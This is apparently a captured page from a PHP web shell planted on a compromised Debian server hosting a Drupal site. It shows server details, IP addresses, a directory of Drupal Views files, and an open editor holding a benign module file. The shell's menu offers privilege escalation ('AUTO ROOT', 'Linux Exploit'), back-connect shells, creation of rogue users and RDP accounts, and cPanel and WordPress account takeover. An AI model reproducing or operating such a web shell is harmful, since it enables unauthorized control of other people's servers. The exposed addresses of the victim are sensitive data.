Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.117.12.223
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
aggregator
[ DIR ]
drwxr-xr-x
book
[ DIR ]
drwxr-xr-x
comment
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
filter
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
node
[ DIR ]
drwxr-xr-x
profile
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
statistics
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
taxonomy
[ DIR ]
drwxr-xr-x
tracker
[ DIR ]
drwxr-xr-x
translation
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
aggregator.views.inc
12.06
KB
-rw-r--r--
book.views.inc
3.37
KB
-rw-r--r--
comment.views.inc
19.74
KB
-rw-r--r--
comment.views_default.inc
14.23
KB
-rw-r--r--
contact.views.inc
450
B
-rw-r--r--
field.views.inc
18.61
KB
-rw-r--r--
file.views.inc
2.33
KB
-rw-r--r--
filter.views.inc
744
B
-rw-r--r--
image.views.inc
2.31
KB
-rw-r--r--
locale.views.inc
5.77
KB
-rw-r--r--
node.views.inc
24.63
KB
-rw-r--r--
node.views_default.inc
16.01
KB
-rw-r--r--
node.views_template.inc
7.79
KB
-rw-r--r--
poll.views.inc
1006
B
-rw-r--r--
profile.views.inc
5.63
KB
-rw-r--r--
search.views.inc
5.74
KB
-rw-r--r--
search.views_default.inc
5.99
KB
-rw-r--r--
statistics.views.inc
6.35
KB
-rw-r--r--
statistics.views_default.inc
12.89
KB
-rw-r--r--
system.views.inc
19.52
KB
-rw-r--r--
taxonomy.views.inc
17.28
KB
-rw-r--r--
taxonomy.views_default.inc
5.63
KB
-rw-r--r--
tracker.views.inc
5.21
KB
-rw-r--r--
translation.views.inc
3.48
KB
-rw-r--r--
user.views.inc
16.23
KB
-rw-r--r--
views.views.inc
3.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : image.views.inc
<?php /** * @file * Provide views data and handlers for image.module. * * @ingroup views_module_handlers */ /** * Implements hook_field_views_data(). * * Views integration for image fields. Adds an image relationship to the default * field data. * * @see field_views_field_default_views_data() */ function image_field_views_data($field) { $data = field_views_field_default_views_data($field); foreach ($data as $table_name => $table_data) { // Add the relationship only on the fid field. $data[$table_name][$field['field_name'] . '_fid']['relationship'] = array( 'handler' => 'views_handler_relationship', 'base' => 'file_managed', 'base field' => 'fid', 'label' => t('image from !field_name', array('!field_name' => $field['field_name'])), ); } return $data; } /** * Implements hook_field_views_data_views_data_alter(). * * Views integration to provide reverse relationships on image fields. */ function image_field_views_data_views_data_alter(&$data, $field) { foreach ($field['bundles'] as $entity_type => $bundles) { $entity_info = entity_get_info($entity_type); $pseudo_field_name = 'reverse_' . $field['field_name'] . '_' . $entity_type; list($label, $all_labels) = field_views_field_label($field['field_name']); $entity = $entity_info['label']; if ($entity == t('Node')) { $entity = t('Content'); } $data['file_managed'][$pseudo_field_name]['relationship'] = array( 'title' => t('@entity using @field', array('@entity' => $entity, '@field' => $label)), 'help' => t('Relate each @entity with a @field set to the image.', array('@entity' => $entity, '@field' => $label)), 'handler' => 'views_handler_relationship_entity_reverse', 'field_name' => $field['field_name'], 'field table' => _field_sql_storage_tablename($field), 'field field' => $field['field_name'] . '_fid', 'base' => $entity_info['base table'], 'base field' => $entity_info['entity keys']['id'], 'label' => t('!field_name', array('!field_name' => $field['field_name'])), 'join_extra' => array( 0 => array( 'field' => 'entity_type', 'value' => $entity_type, ), 1 => array( 'field' => 'deleted', 'value' => 0, 'numeric' => TRUE, ), ), ); } }
Close